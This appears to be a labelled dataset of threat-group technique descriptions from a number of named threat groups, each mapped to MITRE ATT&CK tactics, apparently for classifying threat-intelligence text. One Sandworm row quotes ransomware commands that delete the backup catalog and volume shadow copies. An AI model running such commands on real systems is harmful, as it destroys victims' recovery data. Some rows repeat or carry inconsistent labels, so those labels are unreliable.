PLATINUM has used keyloggers that are also capable of dumping credentials.,['TA0006:Credential Access']
PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.,['TA0002:Execution']
PLATINUM has renamed rar.exe to avoid detection.,['TA0005:Defense Evasion']
PLATINUM has used the Intel® Active Management Technology Serial-over-LAN channel for command and control.,['TA0011:Command and Control']
PLATINUM has used various methods of process injection including hot patching.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.,['TA0001:Initial Access']
POLONIUM has used OneDrive and DropBox for C2.,['TA0011:Command and Control']
POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.,['TA0010:Exfiltration']
POLONIUM has used the AirVPN service for operational activity.,['TA0011:Command and Control']
POLONIUM has obtained and used tools such as AirVPN and plink in their operations.,['TA0042:Resource Development']
POLONIUM has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company.,['TA0001:Initial Access']
POLONIUM has used valid compromised credentials to gain access to victim environments.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
POLONIUM has created and used legitimate Microsoft OneDrive accounts for their operations.,['TA0042:Resource Development']
PROMETHIUM has signed code with self-signed certificates.,['TA0005:Defense Evasion']
PROMETHIUM has created self-signed certificates to sign malicious installers.,['TA0042:Resource Development']
PROMETHIUM has created self-signed digital certificates for use in HTTPS C2 traffic.,['TA0042:Resource Development']
PROMETHIUM has used watering hole attacks to deliver malicious versions of legitimate installers.,['TA0001:Initial Access']
PROMETHIUM has created admin accounts on a compromised host.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"PROMETHIUM has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.",['TA0002:Execution']
PROMETHIUM has named services to appear legitimate.,['TA0005:Defense Evasion']
PROMETHIUM has disguised malicious installer files by bundling them with legitimate software installers.,['TA0005:Defense Evasion']
PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
PROMETHIUM has used Registry run keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PROMETHIUM has created new services and modified existing services for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Patchwork encrypted the collected files' path with AES and then encoded them with base64.,['TA0009:Collection']
"Patchwork developed a file stealer to search C:\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.",['TA0009:Collection']
Patchwork has used BITS jobs to download malicious payloads.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.,['TA0005:Defense Evasion']
Patchwork bypassed User Access Control .,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Patchwork has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.,['TA0005:Defense Evasion']
Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.,['TA0042:Resource Development']
Patchwork has obfuscated a script with Crypto Obfuscator.,['TA0005:Defense Evasion']
Patchwork dumped the login data database from \AppData\Local\Google\Chrome\User Data\Default\Login Data.,['TA0006:Credential Access']
A Patchwork .dll that contains BADNEWS is loaded and executed using DLL side-loading.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Patchwork collected and exfiltrated files from the infected system.,['TA0009:Collection']
Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.,['TA0011:Command and Control']
Patchwork has used watering holes to deliver files with exploits to initial victims.,['TA0001:Initial Access']
Patchwork leveraged the DDE protocol to deliver their malware.,['TA0002:Execution']
"Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.",['TA0002:Execution']
Patchwork removed certain files and replaced them so they could not be retrieved.,['TA0005:Defense Evasion']
A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions.,['TA0007:Discovery']
Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.,['TA0005:Defense Evasion']
Patchwork payloads download additional files from the C2 server.,['TA0011:Command and Control']
Patchwork copied all targeted files to a directory called index that was eventually uploaded to the C&C server.,['TA0009:Collection']
Patchwork embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.,['TA0002:Execution']
"Patchwork has used spearphishing with links to try to get users to click, download and open malicious files.",['TA0002:Execution']
"Patchwork installed its payload in the startup programs folder as ""Baidu Software Update."" The group also adds its second stage payload to the startup programs as “Net Monitor."" They have also dropped QuasarRAT binaries as files named microsoft_network.exe and crome.exe.",['TA0005:Defense Evasion']
A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.,['TA0005:Defense Evasion']
"Patchwork used PowerSploit to download payloads, run a reverse shell, and execute malware on the victim's machine.",['TA0002:Execution']
A Patchwork payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Patchwork has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Patchwork attempted to use RDP to move laterally.,['TA0008:Lateral Movement']
A Patchwork file stealer can run a TaskScheduler DLL to add persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Patchwork scanned the “Program Files” directories for a directory with the string “Total Security” .,['TA0007:Discovery']
A Patchwork payload was packed with UPX.,['TA0005:Defense Evasion']
Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims.,['TA0001:Initial Access']
Patchwork has used spearphishing with links to deliver files with exploits to initial victims.,['TA0001:Initial Access']
"Patchwork has used embedded image tags with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.",['TA0043:Reconnaissance']
Patchwork used Base64 to encode C2 traffic.,['TA0011:Command and Control']
"Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. Patchwork also enumerated all available drives on the victim's machine.",['TA0007:Discovery']
"Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server.",['TA0007:Discovery']
Patchwork has obtained and used open-source tools such as QuasarRAT.,['TA0042:Resource Development']
Patchwork used Visual Basic Scripts on victim machines.,['TA0002:Execution']
Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines.,['TA0002:Execution']
PittyTiger has obtained and used tools such as Mimikatz and gsecdump.,['TA0042:Resource Development']
PittyTiger attempts to obtain legitimate credentials during operations.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Play has used WinRAR to compress files prior to exfiltration.,['TA0009:Collection']
Play has used tools to remove log files on targeted systems.,['TA0005:Defense Evasion']
Play has used Base64-encoded PowerShell scripts for post exploit activities on compromised hosts.,['TA0005:Defense Evasion']
Play has split victims' files into chunks for exfiltration.,['TA0010:Exfiltration']
"Play has used tools including GMER, IOBit, and PowerTool to disable antivirus software.",['TA0005:Defense Evasion']
Play has used valid domain accounts for access.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Play has used WinSCP to exfiltrate data to actor-controlled accounts.,['TA0010:Exfiltration']
Play has exploited known vulnerabilities for initial access including CVE-2018-13379 and CVE-2020-12812 in FortiOS and CVE-2022-41082 and CVE-2022-41040 in Microsoft Exchange.,['TA0001:Initial Access']
Play has used Remote Desktop Protocol and Virtual Private Networks for initial access.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Play has used tools including Wevtutil to remove malicious files from compromised hosts.,['TA0005:Defense Evasion']
Play has used the Grixba information stealer to list security files and processes.,['TA0007:Discovery']
Play demands ransom payments from victims to unencrypt filesystems and to not publish sensitive data exfiltrated from victim networks.,['TA0040:Impact']
Play has used Cobalt Strike to download files to compromised machines.,['TA0011:Command and Control']
Play has used Mimikatz and the Windows Task Manager to dump LSASS process memory.,['TA0006:Credential Access']
Play has used valid local accounts to gain initial access.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Play developed and employ Playcrypt ransomware.,['TA0042:Resource Development']
Play has used Base64-encoded PowerShell scripts to disable Microsoft Defender.,['TA0002:Execution']
Play has used the information stealer Grixba to check for a list of security processes.,['TA0007:Discovery']
"Play has used tools such as AdFind, Nltest, and BloodHound to enumerate shares and hostnames on compromised networks.",['TA0007:Discovery']
Play has used Cobalt Strike to move laterally via SMB.,['TA0008:Lateral Movement']
Play has used the information-stealing tool Grixba to scan for anti-virus software.,['TA0007:Discovery']
Play has leveraged tools to enumerate system information.,['TA0007:Discovery']
Play has used the information-stealing tool Grixba to enumerate network information.,['TA0007:Discovery']
Play has used multiple tools for discovery and defense evasion purposes on compromised hosts.,['TA0042:Resource Development']
Play has used valid VPN accounts to achieve initial access.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Play has used a batch script to remove indicators of its presence on compromised hosts.,['TA0002:Execution']
Poseidon Group searches for administrator accounts on both the local victim machine and the network.,['TA0007:Discovery']
Poseidon Group searches for administrator accounts on both the local victim machine and the network.,['TA0007:Discovery']
Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense.,['TA0005:Defense Evasion']
"Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.",['TA0006:Credential Access']
The Poseidon Group's Information Gathering Tool includes PowerShell components.,['TA0002:Execution']
"After compromising a victim, Poseidon Group lists all running processes.",['TA0007:Discovery']
Poseidon Group obtains and saves information about victim network interfaces and addresses.,['TA0007:Discovery']
"After compromising a victim, Poseidon Group discovers all running services.",['TA0007:Discovery']
Malware used by Putter Panda attempts to terminate processes corresponding to two components of Sophos Anti-Virus .,['TA0005:Defense Evasion']
"An executable dropped onto victims by Putter Panda aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express , Outlook , Internet Explorer , and Firefox .","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Droppers used by Putter Panda use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.,['TA0005:Defense Evasion']
A dropper used by Putter Panda installs itself into the ASEP Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run with a value named McUpdate.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RTM has used search order hijacking to force TeamViewer to load a malicious DLL.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names.,['TA0011:Command and Control']
"RTM has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network Yandex.Direct.",['TA0001:Initial Access']
RTM has attempted to lure victims into opening e-mail attachments to execute malicious code.,['TA0002:Execution']
"RTM has used Registry run keys to establish persistence for the RTM Trojan and other tools, such as a modified version of TeamViewer remote desktop software.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RTM has used a modified version of TeamViewer and Remote Utilities for remote access.,['TA0011:Command and Control']
RTM has used spearphishing attachments to distribute its malware.,['TA0001:Initial Access']
"Rancor has downloaded additional malware, including by using certutil.",['TA0011:Command and Control']
Rancor attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware.,['TA0002:Execution']
Rancor has used msiexec to download and execute malicious installer files over HTTP.,['TA0005:Defense Evasion']
Rancor launched a scheduled task to gain persistence using the schtasks /create /sc command.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rancor has attached a malicious document to an email to gain initial access.,['TA0001:Initial Access']
Rancor has used VBS scripts as well as embedded macros for execution.,['TA0002:Execution']
Rancor has used HTTP for C2.,['TA0011:Command and Control']
Rancor has used cmd.exe to execute commmands.,['TA0002:Execution']
Rancor has complied VBScript-generated MOF files into WMI event subscriptions for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RedCurl has downloaded 7-Zip to decompress password protected archives.,['TA0009:Collection']
RedCurl has used HTTPS for C2 communication.,['TA0011:Command and Control']
RedCurl has used batch scripts to collect data.,['TA0009:Collection']
RedCurl has used batch scripts to exfiltrate data.,['TA0010:Exfiltration']
RedCurl used LaZagne to obtain passwords in files.,['TA0006:Credential Access']
RedCurl used LaZagne to obtain passwords from web browsers.,['TA0006:Credential Access']
RedCurl used LaZagne to obtain passwords in the Registry.,['TA0006:Credential Access']
RedCurl has collected data from the local disk of compromised hosts.,['TA0009:Collection']
RedCurl has collected data about network drives.,['TA0009:Collection']
RedCurl has collected information about domain accounts using SysInternal’s AdExplorer functionality .,['TA0007:Discovery']
RedCurl has collected information about email accounts.,['TA0007:Discovery']
RedCurl has deleted files after execution.,['TA0005:Defense Evasion']
RedCurl has searched for and collected files on local and network drives.,['TA0007:Discovery']
RedCurl prompts the user for credentials through a Microsoft Outlook pop-up.,"['TA0009:Collection', 'TA0006:Credential Access']"
"RedCurl added the “hidden” file attribute to original files, manipulating victims to click on malicious LNK files.",['TA0005:Defense Evasion']
RedCurl has used pcalua.exe to obfuscate binary execution and remote connections.,['TA0005:Defense Evasion']
RedCurl used LaZagne to obtain passwords from memory.,['TA0006:Credential Access']
RedCurl has collected information about local accounts.,['TA0007:Discovery']
RedCurl has collected emails to use in future phishing campaigns.,['TA0009:Collection']
RedCurl has used malicious files to infect the victim machines.,['TA0002:Execution']
RedCurl has used malicious links to infect the victim machines.,['TA0002:Execution']
RedCurl has created its own tools to use during operations.,['TA0042:Resource Development']
"RedCurl mimicked legitimate file names and scheduled tasks, e.g. ` MicrosoftCurrentupdatesCheck` and `MdMMaintenenceTask` to mask malicious files and scheduled tasks.",['TA0005:Defense Evasion']
RedCurl has used netstat to check if port 4119 is open.,['TA0007:Discovery']
"RedCurl has used malware with string encryption. RedCurl has also encrypted data and has encoded PowerShell commands using Base64. RedCurl has used `PyArmor` to obfuscate code execution of LaZagne. Additionally, RedCurl has obfuscated downloaded files by renaming them as commonly used tools and has used `echo`, instead of file names themselves, to execute files.",['TA0005:Defense Evasion']
RedCurl has used PowerShell to execute commands and to download malware.,['TA0002:Execution']
RedCurl has used a Python script to establish outbound communication and to execute commands using SMB port 445.,['TA0002:Execution']
RedCurl has established persistence by creating entries in `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RedCurl has used rundll32.exe to execute malicious files.,['TA0005:Defense Evasion']
RedCurl has created scheduled tasks for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
RedCurl has used phishing emails with malicious files to gain initial access.,['TA0001:Initial Access']
RedCurl has used phishing emails with malicious links to gain initial access.,['TA0001:Initial Access']
RedCurl has used AES-128 CBC to encrypt C2 communications.,['TA0011:Command and Control']
"RedCurl has collected information about the target system, such as system information and list of network connections.",['TA0007:Discovery']
RedCurl has placed modified LNK files on network drives for lateral movement.,['TA0008:Lateral Movement']
"RedCurl has used cloud storage to exfiltrate data, in particular the megatools utilities were used to exfiltrate data to Mega, a file storage service.",['TA0010:Exfiltration']
RedCurl has gained access to a contractor to pivot to the victim’s infrastructure.,['TA0001:Initial Access']
RedCurl has used VBScript to run malicious files.,['TA0002:Execution']
"RedCurl has used HTTP, HTTPS and Webdav protocls for C2 communications.",['TA0011:Command and Control']
RedCurl has used web services to download malicious files.,['TA0011:Command and Control']
RedCurl has used the Windows Command Prompt to execute commands.,['TA0002:Execution']
Rocke issued wget requests from infected systems to the C2.,['TA0011:Command and Control']
"Rocke has installed an ""init.d"" startup script to maintain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rocke has cleared log files within the /var/log/ folder.,['TA0005:Defense Evasion']
"Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection .",['TA0005:Defense Evasion']
Rocke has distributed cryptomining malware.,['TA0040:Impact']
Rocke installed a cron job that downloaded and executed files from the C2.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.,['TA0011:Command and Control']
Rocke has extracted tar.gz files after downloading them from a C2 server.,['TA0005:Defense Evasion']
Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.,['TA0005:Defense Evasion']
Rocke used scripts which detected and uninstalled antivirus software.,['TA0005:Defense Evasion']
Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Rocke exploited Apache Struts, Oracle WebLogic , and Adobe ColdFusion vulnerabilities to deliver malware.",['TA0001:Initial Access']
Rocke has deleted files on infected machines.,['TA0005:Defense Evasion']
"Rocke downloaded a file ""libprocesshider"", which could hide files on the target system.",['TA0005:Defense Evasion']
Rocke used malware to download additional malicious files to the target system.,['TA0011:Command and Control']
Rocke has changed file permissions of files so they could not be modified.,['TA0005:Defense Evasion']
"Rocke has used shell scripts which download mining executables and saves them with the filename ""java"".",['TA0005:Defense Evasion']
Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.,['TA0007:Discovery']
Rocke's miner connects to a C2 server using port 51640.,['TA0011:Command and Control']
Rocke has modified UPX headers after packing files to break unpackers.,['TA0005:Defense Evasion']
"Rocke's miner, ""TermsHost.exe"", evaded defenses by injecting itself into Windows processes, including Notepad.exe.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.,['TA0006:Credential Access']
Rocke can detect a running process's PID on the infected machine.,['TA0007:Discovery']
Rocke has used Python-based malware to install and spread their coinminer.,['TA0002:Execution']
Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rocke has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.,['TA0007:Discovery']
Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.,['TA0005:Defense Evasion']
Rocke has spread its coinminer via SSH.,['TA0008:Lateral Movement']
Rocke used scripts which detected and uninstalled antivirus software.,['TA0007:Discovery']
Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.,['TA0005:Defense Evasion']
Rocke has used uname -m to collect the name and information about the infected system's kernel.,['TA0007:Discovery']
Rocke has installed a systemd service script to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rocke has changed the time stamp of certain files.,['TA0005:Defense Evasion']
Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.,['TA0002:Execution']
Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.,['TA0011:Command and Control']
"Rocke has used Pastebin, Gitee, and GitLab for Command and Control.",['TA0011:Command and Control']
"Saint Bear has used an initial loader malware featuring a legitimate code signing certificate associated with ""Electrum Technologies GmbH.""",['TA0005:Defense Evasion']
Saint Bear has used the Windows Script Host to execute intermediate files written to victim machines.,['TA0002:Execution']
Saint Bear will modify registry entries and scheduled task objects associated with Windows Defender to disable its functionality.,['TA0005:Defense Evasion']
Saint Bear gathered victim email information in advance of phishing operations for targeted attacks.,['TA0043:Reconnaissance']
Saint Bear initial payloads included encoded follow-on payloads located in the resources file of the first-stage loader.,['TA0005:Defense Evasion']
Saint Bear has leveraged vulnerabilities in client applications such as CVE-2017-11882 in Microsoft Office to enable code execution in victim environments.,['TA0002:Execution']
Saint Bear has impersonated government and related entities in both phishing activity and developing web sites with malicious links that mimic legitimate resources.,['TA0005:Defense Evasion']
"Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot.",['TA0002:Execution']
Saint Bear relies on user interaction and execution of malicious attachments and similar for initial execution on victim systems.,['TA0002:Execution']
"Saint Bear has, in addition to email-based phishing attachments, used malicious websites masquerading as legitimate entities to host links to malicious files for user execution.",['TA0002:Execution']
Saint Bear will leverage malicious Windows batch scripts to modify registry values associated with Windows Defender functionality.,['TA0005:Defense Evasion']
Saint Bear relies extensively on PowerShell execution from malicious attachments and related content to retrieve and execute follow-on payloads.,['TA0002:Execution']
Saint Bear clones .NET assemblies from other .NET binaries as well as cloning code signing certificates from other software to obfuscate the initial loader payload.,['TA0005:Defense Evasion']
"Saint Bear uses a variety of file formats, such as Microsoft Office documents, ZIP archives, PDF documents, and other items as phishing attachments for initial access.",['TA0001:Initial Access']
Saint Bear has used the Discord content delivery network for hosting malicious content referenced in links and emails.,['TA0042:Resource Development']
Saint Bear contains several anti-analysis and anti-virtualization checks.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Saint Bear has leveraged the Discord content delivery network to host malicious content for retrieval during initial access operations.,['TA0042:Resource Development']
"Saint Bear initial loaders will also drop a malicious Windows batch file, available via open source GitHub repositories, that disables Microsoft Defender functionality.",['TA0002:Execution']
Sandworm Team used various third-party email campaign management services to deliver phishing emails.,['TA0042:Resource Development']
Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.,['TA0011:Command and Control']
Sandworm Team has used a large-scale botnet to target Small Office/Home Office network devices.,['TA0042:Resource Development']
"In preparation for its attack against the 2018 Winter Olympics, Sandworm Team conducted online research of partner organizations listed on an official PyeongChang Olympics partnership site.",['TA0043:Reconnaissance']
"Sandworm Team has used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.",['TA0005:Defense Evasion']
Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.,['TA0001:Initial Access']
Sandworm Team's CredRaptor tool can collect saved passwords from various internet browsers.,['TA0006:Credential Access']
"Sandworm Team has used CaddyWiper, SDelete, and the BlackEnergy KillDisk component to overwrite files on victim systems. Additionally, Sandworm Team has used the JUNKMAIL tool to overwrite files with null bytes.",['TA0040:Impact']
Sandworm Team has used Prestige ransomware to encrypt data at targeted organizations in transportation and related logistics industries in Ukraine and Poland.,['TA0040:Impact']
Sandworm Team exfiltrates data of interest from enterprise databases using Adminer.,['TA0009:Collection']
"Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.",['TA0009:Collection']
Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.,['TA0005:Defense Evasion']
Sandworm Team has used the BlackEnergy KillDisk component to corrupt the infected system's master boot record.,['TA0040:Impact']
"Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.",['TA0007:Discovery']
Sandworm Team has used stolen credentials to access administrative accounts within the domain.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.,['TA0043:Reconnaissance']
"Sandworm Team has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages, while also hosting these items on legitimate, compromised network infrastructure.",['TA0042:Resource Development']
"Sandworm Team used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.",['TA0007:Discovery']
Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations.,['TA0042:Resource Development']
Sandworm Team has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.,['TA0043:Reconnaissance']
Sandworm Team's research of potential victim organizations included the identification and collection of employee information.,['TA0043:Reconnaissance']
"Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.",['TA0040:Impact']
Sandworm Team has sent system information to its C2 server using HTTP.,['TA0010:Exfiltration']
"Sandworm Team exploits public-facing applications for initial access and to acquire infrastructure, such as exploitation of the EXIM mail transfer agent in Linux systems.",['TA0001:Initial Access']
Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects and Microsoft Word via crafted TIFF images .,['TA0002:Execution']
"Sandworm Team defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.",['TA0040:Impact']
Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Sandworm Team has used backdoors that can delete files used in an attack from an infected system.,['TA0005:Defense Evasion']
Sandworm Team has enumerated files on a compromised host.,['TA0007:Discovery']
"Sandworm Team has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.",['TA0011:Command and Control']
Sandworm Team uses Prestige to delete the backup catalog from the target system using: `C:\Windows\System32\wbadmin.exe delete catalog -quiet` and to delete volume shadow copies using: `C:\Windows\System32\vssadmin.exe delete shadows /all /quiet`.,['TA0040:Impact']
Sandworm Team has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Sandworm Team has used its plainpwd tool, a modified version of Mimikatz, and comsvcs.dll to dump Windows credentials from system memory.",['TA0006:Credential Access']
"Sandworm Team has used `move` to transfer files to a network share and has copied payloads--such as Prestige ransomware--to an Active Directory Domain Controller and distributed via the Default Domain Group Policy Object. Additionally, Sandworm Team has transferred an ISO file into the OT network to gain initial access.",['TA0008:Lateral Movement']
Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.,['TA0002:Execution']
Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.,['TA0002:Execution']
"Sandworm Team has developed malware for its operations, including malicious mobile applications and destructive malware such as NotPetya and Olympic Destroyer.",['TA0042:Resource Development']
Sandworm Team masqueraded malicious installers as Windows update packages to evade defense and entice users to execute binaries.,['TA0005:Defense Evasion']
Sandworm Team has avoided detection by naming a malicious binary explorer.exe.,['TA0005:Defense Evasion']
"Sandworm Team has used `ntdsutil.exe` to back up the Active Directory database, likely for credential access.",['TA0006:Credential Access']
Sandworm Team uses Prestige to disable and restore file system redirection by using the following functions: `Wow64DisableWow64FsRedirection` and `Wow64RevertWow64FsRedirection`.,['TA0002:Execution']
Sandworm Team has used intercepter-NG to sniff passwords in network traffic.,"['TA0006:Credential Access', 'TA0007:Discovery']"
Sandworm Team has used port 6789 to accept connections on the group's SSH server.,['TA0011:Command and Control']
Sandworm Team has used Base64 encoding within malware variants.,['TA0005:Defense Evasion']
Sandworm Team has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.,['TA0002:Execution']
"Sandworm Team's BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.",['TA0011:Command and Control']
Sandworm Team has used remote administration tools or remote industrial control system client software for execution and to maliciously release electricity breakers.,['TA0011:Command and Control']
"Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.",['TA0007:Discovery']
Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.,['TA0005:Defense Evasion']
Sandworm Team has copied payloads to the `ADMIN$` share of remote systems and run net use to connect to network shares.,['TA0008:Lateral Movement']
"Sandworm Team leveraged SHARPIVORY, a .NET dropper that writes embedded payload to disk and uses scheduled tasks to persist on victim machines.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Sandworm Team researched Ukraine's unique legal entity identifier , including running queries on the EDRPOU website, in preparation for the NotPetya attack. Sandworm Team has also researched third-party websites to help it craft credible spearphishing emails.",['TA0043:Reconnaissance']
Sandworm Team has conducted research against potential victim websites as part of its operational planning.,['TA0043:Reconnaissance']
Sandworm Team has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.,['TA0042:Resource Development']
Sandworm Team compromised legitimate Linux servers running the EXIM mail transfer agent for use in subsequent campaigns.,['TA0042:Resource Development']
Sandworm Team attempts to stop the MSSQL Windows service to ensure successful encryption of locked files.,['TA0040:Impact']
"Sandworm Team creates credential capture webpages to compromise existing, legitimate social media accounts.",['TA0042:Resource Development']
Sandworm Team has established social media accounts to disseminate victim internal-only documents and other sensitive data.,['TA0042:Resource Development']
"Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. Sandworm Team also collected a list of computers using specific software as part of its targeting efforts.",['TA0043:Reconnaissance']
Sandworm Team has used the commercially available tool RemoteExec for agentless remote code execution.,"['TA0002:Execution', 'TA0008:Lateral Movement']"
Sandworm Team has delivered malicious Microsoft Office and ZIP file attachments via spearphishing emails.,['TA0001:Initial Access']
Sandworm Team has crafted phishing emails containing malicious hyperlinks.,['TA0001:Initial Access']
Sandworm Team has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.,['TA0043:Reconnaissance']
Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.,['TA0011:Command and Control']
Sandworm Team used information stealer malware to collect browser session cookies.,['TA0006:Credential Access']
"Sandworm Team staged compromised versions of legitimate software installers on forums to achieve initial, untargetetd access in victim environments.",['TA0001:Initial Access']
Sandworm Team used a backdoor to enumerate information about the infected system's operating system.,['TA0007:Discovery']
"Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured.",['TA0007:Discovery']
